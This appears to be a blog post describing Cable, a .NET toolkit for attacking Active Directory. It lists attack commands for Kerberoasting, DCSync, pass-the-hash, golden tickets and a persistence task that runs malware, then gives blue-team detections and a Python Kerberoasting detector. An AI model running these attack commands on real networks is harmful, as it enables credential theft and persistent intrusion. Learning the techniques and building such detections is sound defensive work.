GitHub – logangoins/Cable: .NET Post-Exploitation Toolkit for Active Directory Reconnaissance and Exploitation

Cable is a powerful .NET post-exploitation toolkit designed for Active Directory (AD) reconnaissance and exploitation. It provides red teams and penetration testers with advanced capabilities to assess and exploit AD environments effectively.

You Should Know:

1. Key Features of Cable:

  • AD Reconnaissance: Enumerate users, groups, computers, and trust relationships.
  • Exploitation Modules: Execute attacks like Kerberoasting, AS-REP Roasting, and DCSync.
  • Lateral Movement: Facilitate pass-the-hash, pass-the-ticket, and other lateral movement techniques.
  • Persistence Mechanisms: Establish backdoors and maintain access in compromised environments.

2. Installation & Setup:

git clone https://github.com/logangoins/Cable.git 
cd Cable 
dotnet restore 
dotnet build 

3. Basic Commands for AD Reconnaissance:

Enumerate Domain Users
Cable.exe --command users --domain example.com

Extract SPNs for Kerberoasting 
Cable.exe --command kerberoast --output kerberoast_hashes.txt

Perform DCSync Attack (Requires DA Privileges) 
Cable.exe --command dcsync --user administrator --domain example.com 

4. Exploitation Examples:

AS-REP Roasting Attack
Cable.exe --command asreproast --users vulnerable_users.txt

Pass-the-Hash Attack 
Cable.exe --command pth --user bob --ntlm aad3b435b51404eeaad3b435b51404ee --target 192.168.1.10 

5. Post-Exploitation & Persistence:

Golden Ticket Attack
Cable.exe --command golden --krbtgt <hash> --domain example.com --sid S-1-5-21-...

Create a Hidden Scheduled Task for Persistence 
Cable.exe --command schtask --name "UpdateTask" --command "cmd /c C:\malware.exe" 

What Undercode Say:

Cable is a formidable tool for offensive security professionals working in AD environments. However, misuse can lead to severe security breaches. Defenders should monitor for abnormal .NET executions, unusual Kerberos ticket requests, and unexpected DCSync activities.

Blue Team Countermeasures:

Detect Suspicious Kerberos Requests (SIEM Query)
EventID=4769 AND (TicketOptions=0x40810000 OR TicketEncryption=0x17)

Hunt for DCSync Attacks 
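# Event 4662 records the accessed right as a GUID: 1131f6aa-... is DS-Replication-Get-Changes, 1131f6ad-... is DS-Replication-Get-Changes-All
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4662} | Where-Object { $_.Message -match '1131f6a[ad]-9c07-11d1-f79f-00c04fc2dcd2' }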

Block Pass-the-Hash with LSA Protection (Windows) 
reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 1 /f 
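
The RC4 branch of the Kerberos query above (TicketEncryption=0x17) matches a lot of benign traffic on its own, so the following added example (not part of the original post or of Cable) groups exported 4769 events per requester and alerts only on a burst of distinct user-backed SPNs. The events are constructed samples, and the 5-minute window and threshold of 3 are assumed tuning values.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17                  # TicketEncryptionType value from the SIEM query
WINDOW = timedelta(minutes=5)    # assumed tuning value
THRESHOLD = 3                    # assumed: distinct SPNs per requester inside WINDOW

def ev(time, user, ip, service, etype):
    # Build one constructed 4769 record using the Windows event field names.
    return {"EventID": 4769, "TimeCreated": time, "TargetUserName": user,
            "IpAddress": ip, "ServiceName": service, "TicketEncryptionType": etype}

EVENTS = [  # constructed sample data, not taken from a real environment
    ev("2024-05-01T09:00:05", "jdoe@EXAMPLE.COM", "10.0.0.50", "svc_sql", "0x17"),
    ev("2024-05-01T09:00:07", "jdoe@EXAMPLE.COM", "10.0.0.50", "svc_web", "0x17"),
    ev("2024-05-01T09:00:09", "jdoe@EXAMPLE.COM", "10.0.0.50", "svc_backup", "0x17"),
    ev("2024-05-01T09:00:10", "jdoe@EXAMPLE.COM", "10.0.0.50", "FILESRV01$", "0x17"),
    ev("2024-05-01T09:01:00", "asmith@EXAMPLE.COM", "10.0.0.61", "svc_sql", "0x12"),
    ev("2024-05-01T09:02:00", "asmith@EXAMPLE.COM", "10.0.0.61", "svc_legacy", "0x17"),
    ev("2024-05-01T08:00:00", "bwhite@EXAMPLE.COM", "10.0.0.72", "svc_sql", "0x17"),
    ev("2024-05-01T11:00:00", "bwhite@EXAMPLE.COM", "10.0.0.72", "svc_web", "0x17"),
    ev("2024-05-01T14:00:00", "bwhite@EXAMPLE.COM", "10.0.0.72", "svc_backup", "0x17"),
]

def is_candidate(e):
    """True for an RC4 service ticket whose SPN is not a machine account or krbtgt."""
    svc = e["ServiceName"].lower()
    return (e["EventID"] == 4769 and int(e["TicketEncryptionType"], 16) == RC4_HMAC
            and not svc.endswith("$") and svc != "krbtgt")

def find_roasting_bursts(events, window=WINDOW, threshold=THRESHOLD):
    """Map (requester, ip) to the SPNs requested with RC4 in any window hitting threshold."""
    per_source = defaultdict(list)
    for e in filter(is_candidate, events):
        key = (e["TargetUserName"].lower(), e["IpAddress"])
        per_source[key].append((datetime.fromisoformat(e["TimeCreated"]), e["ServiceName"]))
    alerts = {}
    for source, hits in per_source.items():
        hits.sort()              # chronological order for the sliding window
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1       # drop requests that fell out of the window
            spns = {s for _, s in hits[start:end + 1]}
            if len(spns) >= threshold:
                alerts[source] = sorted(spns | set(alerts.get(source, [])))
    return alerts

if __name__ == "__main__":
    print(find_roasting_bursts(EVENTS))
```

Only the jdoe burst alerts; the AES request, the machine-account ticket and the three RC4 requests spread over six hours do not.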

Expected Output:

A detailed report of AD enumeration, exploitation logs, and extracted credential hashes for further analysis.

Reference:

Reported By: Florian Hansemann – Hackers Feeds